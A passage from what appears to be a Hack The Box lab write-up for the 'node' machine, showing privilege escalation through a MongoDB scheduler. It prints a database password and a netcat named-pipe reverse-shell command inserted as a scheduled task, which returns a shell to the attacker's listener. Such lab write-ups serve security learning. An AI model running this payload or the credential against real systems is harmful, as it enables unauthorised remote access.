tom


mark@node:/var/scheduler$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
> db.tasks.find()

I first connected to the scheduler database with the recovered credential and looked at the existing tasks collection. It is empty.

> db.tasks.insertOne({ cmd: "mkfifo /tmp/dvxv; nc 10.10.14.5 8888 0</tmp/dvxv | /bin/sh >/tmp/dvxv 2>&1; rm /tmp/dvxv" });

{
	"acknowledged" : true,
	"insertedId" : ObjectId("63c8a002d7a7ce3188291e33")
}

I used the db.collection.insertOne() method to create a new document with a single field, "cmd", containing the payload.

> db.tasks.find()
 
{ "_id" : ObjectId("63c8a002d7a7ce3188291e33"), "cmd" : "mkfifo /tmp/dvxv; nc 10.10.14.5 8888 0</tmp/dvxv | /bin/sh >/tmp/dvxv 2>&1; rm /tmp/dvxv" }

I can confirm it with db.collection.find(): the tasks collection now contains the document I inserted.

The scheduler should pick this up and execute it in less than 30 seconds.

┌──(kali㉿kali)-[~/archive/htb/labs/node]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.58] 41832
whoami
tom
hostname
node
ifconfig
ens33     Link encap:Ethernet  HWaddr 00:50:56:b9:1b:9d  
          inet addr:10.10.10.58  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:1b9d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:649792 errors:0 dropped:116 overruns:0 frame:0
          TX packets:1056241 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:81752813 (81.7 MB)  TX bytes:1524701811 (1.5 GB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:168340 errors:0 dropped:0 overruns:0 frame:0
          TX packets:168340 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:13834119 (13.8 MB)  TX bytes:13834119 (13.8 MB)

As expected, a shell came back, running as tom on node.